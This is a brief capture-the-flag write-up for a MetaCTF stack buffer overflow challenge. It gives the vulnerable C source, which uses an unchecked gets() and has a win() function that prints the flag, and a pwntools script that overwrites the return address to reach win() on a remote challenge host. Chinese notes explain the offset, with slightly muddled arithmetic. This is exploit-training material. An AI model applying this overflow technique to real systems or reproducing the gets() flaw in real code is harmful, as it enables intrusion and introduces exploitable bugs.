###### tags: `MetaCTF` # buff 1 ```c= #include <stdio.h> #include <stdlib.h> void win() { system("/bin/cat flag.txt"); exit(0); } void vuln() { char buf[48]; puts("Enter the access code: "); gets(buf); if(strcmp(buf, "Sup3rs3cr3tC0de") == 0) { puts("Access granted!"); } else { puts("Invalid auth."); exit(-1); } } int main() { setbuf(stdout, 0); setbuf(stdin, 0); setbuf(stderr, 0); vuln(); return 0; } ``` ```python= from pwn import * context.arch = 'amd64' #p = process("./b0") p = remote("host1.metaproblems.com",5151) p.sendline("Sup3rs3cr3tC0de"+"\00"+"a"*40+p64(0x401172)) p.interactive() ``` - 先輸入他的code後加一個空字元讓他吃進去 - 在後面補滿48+8(saved rbp)=56-15(code)+1(空字元) = 40 - 利用objdmup -d找到win address跳上去